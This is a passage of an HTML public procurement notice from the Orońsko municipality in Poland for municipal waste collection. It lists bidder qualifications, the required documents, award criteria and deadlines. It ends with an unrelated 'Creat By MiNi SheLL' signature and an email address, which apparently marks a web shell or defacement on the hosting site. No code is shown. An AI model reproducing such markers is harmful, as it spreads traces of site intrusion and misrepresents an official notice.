   3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi                     do wykonania zamówienia.
   4)  sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.


Na potwierdzenie spełniania warunku udziału w postępowaniu Wykonawca winien złożyć oświadczenie o spełnieniu warunków  udziału w postępowaniu o zamówienie publiczne             z art. 22 ust. 1  (załącznik nr 2).
Ocena spełnienia warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia. Oznacza to, że wystarczającym powodem do wykluczenia Wykonawcy może być brak w ofercie wymaganego oświadczenia lub jego nie uzupełnienie, we wskazanym przez Zamawiającego terminie, w trybie art. 26 ust. 3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2015 r.,  poz. 2164).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien złożyć wykaz wykonanych , a w przypadku świadczeń ciągłych wykonywanych usług, w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich trzech lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie( minimum 2 usługi) , z podaniem ich miejsca, rodzaju, daty i wartości wykonania  -  (załącznik nr 5)  oraz  załączenie dowodów, czy zostały wykonane lub są wykonywane należycie.
Ocena spełnienia warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia. Oznacza to, że wystarczającym powodem do wykluczenia Wykonawcy może być brak w ofercie wymaganego wykazu lub jego nie uzupełnienie, we wskazanym przez Zamawiającego terminie, w trybie art. 26 ust. 3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2015 r., poz. 2164).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia  warunku potencjał techniczny dokonana zostanie na podstawie dysponowania: 
- samochodami przystosowanymi do odbierania zmieszanych odpadów komunalnych -min. 2 szt.;
- samochodami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych - min.     2 szt.;
- samochód przystosowany do odbierania odpadów bez funkcji kompaktujacej - 1 szt..

         Wykonawca winien złożyć wykaz sprzętu, - z wykorzystaniem wzoru (załącznik nr 8).
Ocena spełnienia warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia. Oznacza to, że wystarczającym powodem do wykluczenia Wykonawcy może być brak w ofercie wymaganego wykazu lub jego nie uzupełnienie, we wskazanym przez Zamawiającego terminie, w trybie art. 26 ust. 3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2015 r., poz. 2164 ze zm.).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, Wykonawca zobowiązany jest załączyć do oferty oświadczenie o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 ustawy Pzp (wzór stanowi załącznik nr 4 do oferty). Ocena spełniania wymaganych warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia,  w oparciu o informacje  zawarte w załączonych do oferty dokumentach                                              i oświadczeniach, które były wymagane przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie przedmiotu zamówienia, Wykonawca zobowiązany jest załączyć do oferty oświadczenie  o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 ustawy Pzp (wzór stanowi załącznik nr 2 do oferty). 
     Ocena spełniania wymaganych warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje  zawarte w załączonych do oferty dokumentach    i oświadczeniach, które były wymagane przez Zamawiającego .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W przedmiotowym postępowaniu w wykazie należy wskazać usługi potwierdzające spełnienie warunku udziału w postępowaniu dotyczącego wiedzy i doświadczenia, tj. warunku określonego w pkt 6 ppkt 6.3 siwz. Zamawiający nie wymaga złożenia informacji ani dowodów dotyczących innych usług.                W przypadku  ww. usług wykonawca ma także obowiązek załączenia dowodów, o których mowa wyżej, tj. poświadczenia potwierdzającego należyte wykonanie danej usługi, wystawionego przez podmiot  zamawiający daną usługę. Ww. poświadczenie może być zastąpione innym dokumentem potwierdzającym należyte wykonanie usługi. Jeżeli  z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa wyżej, w takim przypadku wykonawca ma obowiązek załączenia do oferty uzasadnienia dotyczącego obiektywnej niemożliwości uzyskania poświadczenia;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- wypełniony formularz ofertowy -  załącznik nr 1 do siwz;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin płatności faktury - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Strony mogą zmienić postanowienia zawartej umowy w zakresie terminu wykonania:
a) jeżeli nastąpiła siła wyższa obejmująca klęski żywiołowe.
2.	Strony mogą zmienić postanowienia zawartej umowy w zakresie wartości umowy, jeśli nastąpi urzędowa zmiana stawki podatku VAT, zaistniała po dacie zawarcia umowy.
3.	Strony mogą zmienić postanowienia zawartej umowy w zakresie podwykonawców                po spełnieniu niniejszego warunku: w przypadku gdy Wykonawca spełnił warunki udziału w postępowaniu polegając na doświadczeniu podwykonawcy, zmiana tego podwykonawcy w trakcie realizacji przedmiotu niniejszej umowy musi być uzasadniona przez Wykonawcę na piśmie i wymaga pisemnego zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje taką zmianę w terminie 14 dni od daty przedłożenia i wyłącznie wtedy, gdy doświadczenie wskazanego podwykonawcy będzie takie same lub wyższe od doświadczenia podwykonawcy, na którym polegał Wykonawca.
4.	Wykonawca występujący o zmianę umowy zobowiązany jest do udokumentowania zaistnienia przesłanek określonych w ust. 1-3. Wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.
5.	Zmiana postanowień zawartej umowy nastąpi za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.oronsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Orońsko, ul. Szkolna 8, 26-505  Orońsko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2016 godzina 10:00, miejsce: siedziba Zamawiającego, I piętro - pokój  nr  3  (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com